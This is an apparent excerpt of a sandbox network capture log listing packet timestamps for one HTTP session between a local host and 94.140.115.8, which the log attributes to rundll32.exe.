Apr 28, 2022 15:47:52.470524073 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.470540047 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.470552921 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.470587969 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.470613003 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.492372036 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.492404938 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.492422104 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.492434025 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.492525101 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.492556095 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.493151903 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.493201017 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.493232965 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.493268967 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.493300915 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.493314981 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.493350983 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.503247023 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.503277063 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.503293037 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.503308058 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.503416061 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.503434896 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.525259018 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.525288105 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.525306940 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.525325060 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.525341988 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.525365114 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.525382042 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.525393963 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.525408030 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.525435925 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.525456905 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.526645899 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.526670933 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.526705980 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.526717901 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.526736021 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.526747942 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.526797056 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.527530909 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.527556896 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.527574062 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.527585983 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.527611971 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.527632952 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.558998108 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.559027910 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.559046984 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.559066057 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.559082985 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.559098959 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.559113026 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.559135914 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.559185982 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.559232950 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.559247017 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.559269905 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.559310913 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.636763096 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.710238934 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:53.034704924 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:53.034733057 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:53.034774065 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:53.034794092 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:48:47.712887049 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.4 | 49759 | 94.140.115.8 | 80 | C:\Windows\SysWOW64\rundll32.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 28, 2022 15:47:50.266267061 CEST | 1155 | OUT | |
Apr 28, 2022 15:47:50.638051987 CEST | 1156 | IN |